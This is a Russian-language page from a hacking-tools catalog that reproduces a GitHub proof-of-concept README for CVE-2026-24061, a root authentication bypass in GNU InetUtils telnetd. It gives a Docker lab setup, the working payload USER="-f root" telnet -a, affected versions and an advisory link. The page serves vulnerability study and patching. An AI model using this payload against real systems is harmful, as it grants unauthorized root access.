Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061 — Уязвимость в GNU InetUtils telnetd позволяет удалённый доступ с правами root | Kitploit
Инструменты/GitHubGitHub/lucaspdiniz/cve-2026-24061
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеАутентификацияИнструмент Удаленного Доступа
GitHublucaspdiniz/cve-2026-24061

CVE-2026-24061

Уязвимость в GNU InetUtils telnetd позволяет удалённый доступ с правами root

Репозиторий
47 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Обход аутентификации в GNU InetUtils telnetd через внедрение аргументов - CVE-2026-24061 📚

Введение

Недавно выявленная уязвимость внедрения аргументов в GNU InetUtils telnetd позволяет злоумышленникам обойти аутентификацию, установив переменную окружения USER в значение «-f root». В результате удаленный неаутентифицированный злоумышленник может получить доступ к системам, работающим с уязвимой службой telnetd, и повысить привилегии до root. При успешной эксплуатации этот недостаток может позволить злоумышленникам получить доступ к конфиденциальной информации, изменить настройки системы и выполнять произвольные команды, что потенциально может привести к полному компрометации системы.

Детали CVSSCNA (MITRE)
Базовый балл9.8
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииНет
Взаимодействие с пользователемНет
Область действияБез изменений
Влияние на конфиденциальностьВысокое
Влияние на целостностьВысокое
Влияние на доступностьВысокое
Версия CVSSv33.1

Что произошло?

Нам удалось получить доступ к коммиту ниже от 2015 года, который показывает изменение кода (строка 62), создавшее эту уязвимость.

Цель этого readme — только показать выполнение эксплойта, а не каждый шаг, который привел к созданию этого CVE. Однако суть заключается в замене заполнителя %U значением, взятым из переменной окружения USER. Эта конкретная переменная окружения контролируется пользователем и может быть изменена через протокол Telnet 🔥.

Окружение 🔓

Для этого теста я создал 2 контейнера, используя образы с Docker Hub, с уязвимой версией InetUtils.

  • Контейнер -> https://hub.docker.com/_/ubuntu
root@kitploit:~
docker run --rm -it --name vuln -p 23:23 ubuntu:22.04 bash
      apt update
      apt install build-essential wget tar
      wget http://ftp.gnu.org/gnu/inetutils/inetutils-2.5.tar.gz
      tar -xvzf inetutils-2.5.tar.gz
      cd inetutils-2.5
      ./configure
      ./configure --enable-telnet
      make clean
      make
      make install
      export PATH=$PATH:/usr/local/libexec
      apt install openbsd-inetd
      echo "telnet  stream  tcp  nowait  root  /usr/local/libexec/telnetd  telnetd" >> /etc/inetd.conf
      service openbsd-inetd restart

docker run --rm -it --name attacker ubuntu bash
      apt install telnet

Полезная нагрузка 💀

С помощью приведенной ниже полезной нагрузки мы заменяем переменную USER и обходим систему аутентификации.

root@kitploit:~
USER="-f root" telnet -a 172.17.0.3

Затронутые версии ✅

  • Telnetd в GNU Inetutils до версии 2.7 позволяет удаленную аутентификацию.
  • Следуйте обновлению для версии Ubuntu. -> https://ubuntu.com/security/CVE-2026-24061

Проверьте версию вашего inetutils

root@kitploit:~
hostname --version
telnetd --version


До встречи :wink:

Скачать инструмент